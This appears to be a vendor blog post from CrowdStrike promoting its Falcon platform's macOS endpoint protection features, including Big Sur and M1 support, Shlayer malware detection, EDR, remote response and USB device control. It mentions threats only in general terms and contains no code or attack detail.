MacOS is ubiquitous in enterprise environments, with no signs of slowing down. Recent IDC analysis shows macOS devices have reached a whopping 23% utilization in enterprises (with 1,000+ employees) during 2020 — a 6% increase over 2019. IDC believes that contributing factors for the Mac’s recent surge in adoption include the COVID-19 pandemic, end user preference and OS-flexible cloud business capabilities.

CrowdStrike Services has observed threat actors increasingly targeting macOS environments and gaining access in numerous ways, from adware and phishing attacks to sophisticated malware-free and “living off the land” approaches. Compared to Windows systems in the same organization, macOS systems often lack monitoring and management, enabling threat actors to stay active and undetected in macOS environments for months.

With the increases in utilization and unwanted attention from threat actors, macOS security through obscurity is no more. Utilizing the Crowdstrike CrowdStrike Falcon® platform, teams can awaken their inner Theodore Roosevelt to “speak softly and carry a big stick.”

Extending Visibility and Security Management with macOS

CrowdStrike is an industry leader in endpoint protection across operating systems. With its single lightweight agent and cloud-native security platform, the Falcon platform offers comprehensive Mac endpoint protection simply and effectively. Day One support for major OS updates eliminates gaps in coverage and the “here we go again” stress for teams supporting Mac environments. CrowdStrike comprehensive coverage goes beyond next-generation antivirus (NGAV) and endpoint detection and response (EDR) with macOS capabilities spanning threat intelligence, IT hygiene, device control and enhanced visibility through Zero Trust Assessment.

Knowing many macOS users love to be on the cutting-edge and quickly adopt new capabilities, CrowdStrike got to work early in 2020 and was one of the first vendors to offer Day One support for the Big Sur OS with a generally available version of the Falcon agent. Apple updates continued beyond the major Big Sur OS introduction and extended into the architecture with a shift from Intel x86 to an Apple-designed processor called M1. The Falcon platform provided initial M1 support through Rosetta 2 emulation layers, ensuring that customers running with new M1 chips were protected. (Native M1 support will be generally available later this month.) 

As with most operating systems, there’s good reason to stay current with version updates, especially those that include security patches and enhancements. In late April 2021, a new variant of the Shlayer malware made the news. This malware takes advantage of a vulnerability in macOS and bypasses Gatekeeper and other native security technologies that prevent unapproved software from running.

Though Apple has since patched this vulnerability, this example demonstrates the ongoing need for continuous visibility and protection. Falcon detects Shlayer malware variants and further extends protection with Mac script control, which provides visibility into the contents of macOS scripts, enabling script-based threat detection and prevention. Additional prevention technologies for macOS combine for broad, effective protection: on-sensor machine learning for malware and adware protection, indicator of attack (IOA) behavioral blocking, custom IOA blocking, and detections based on threat intelligence reputation.

CrowdStrike Falcon Insight™ EDR provides unparalleled visibility and accelerates threat detection and response. Continuous monitoring across all operating systems offers full details and raw events including network telemetry to enable proactive and managed threat hunting and forensic investigations. Analysts can easily search through all collected events at scale, with no UI limitations that would delay investigation.

Wielding this trove of information, analysts can respond and remediate with confidence. Falcon Real Time Response (RTR) embodies “speak softly and carry a big stick” — incident responders remotely connect directly to the target host, gather additional relevant files and details, establish network containment, then upload and launch files and/or remediation scripts to deliver full remediation at scale.

External devices such as USB mass storage devices are a very common attack vector that can be exploited easily. By controlling the connection of external devices, teams can essentially create an effective barrier to external threats for a layered approach to risk reduction and protection. Device Control for macOS gives analysts intuitive and granular control of external USB devices in Big Sur environments without any additional endpoint software or hardware to manage, and with quick out-of-the-box deployment for protection. Beta is scheduled to begin in June 2021. 

The Falcon platform further extends macOS capabilities with CROWDSTRIKE FALCON® INTELLIGENCE™ threat intelligence, Falcon Discover™ IT hygiene and Falcon Zero Trust Assessment™.

• OS-spanning threat intelligence with CROWDSTRIKE FALCON® INTELLIGENCE: Specialized intelligence for Mac is a force multiplier for analysts beyond what happened on the endpoint, revealing the “who, why and how” behind the attack. High-fidelity understanding and correlation of threats faced improves the efficacy of security investments with actionable and customized intelligence to defend against future attacks — for a proactive security reality.

• macOS coverage has recently been enhanced to increase monitoring capabilities for CrowdStrike’s IT hygiene solution, Falcon Discover. Extended coverage for application inventory and host monitoring gives analysts enriched visibility to monitor usage, application installs and account access activity. Analysts are also able to monitor CPU and RAM capacity for macOS within the System Capacity dashboard and gain increased visibility for vulnerabilities within the Drive Encryption dashboard. With this extended coverage, analysts have broadened visibility to see what accounts, applications or systems are potentially at risk, and can pivot quickly for more in-depth analysis.

• Falcon Zero Trust Assessment provides enhanced visibility of the overall health of a Mac endpoint with a single metric. Administrators easily drill down to view Falcon prevention policy settings on specific Mac endpoints, along with recommendations to improve security posture. These metrics can be shared with CrowdStrike partners for real-time conditional access enforcement. 

Continuing the Fight 

The enterprise Mac footprint is increasing and so are the number of macOS threats organizations are facing. These increases highlight the need for complete visibility and comprehensive security management for teams to stay ahead of threat actors to keep organizations secure. CrowdStrike will continue to show the way with industry-leading visibility and comprehensive endpoint protection for all types of workloads anywhere.

Additional Resources

• Learn more about how CrowdStrike Falcon® extends protection for macOS here. 
• Download the CrowdStrike Falcon® for macOS data sheet here. 
• Read how “CrowdStrike Falcon® Supports New macOS Big Sur” in the blog. 
• Visit the CROWDSTRIKE FALCON® INTELLIGENCE, Falcon Discover and Falcon Insight EDR product pages.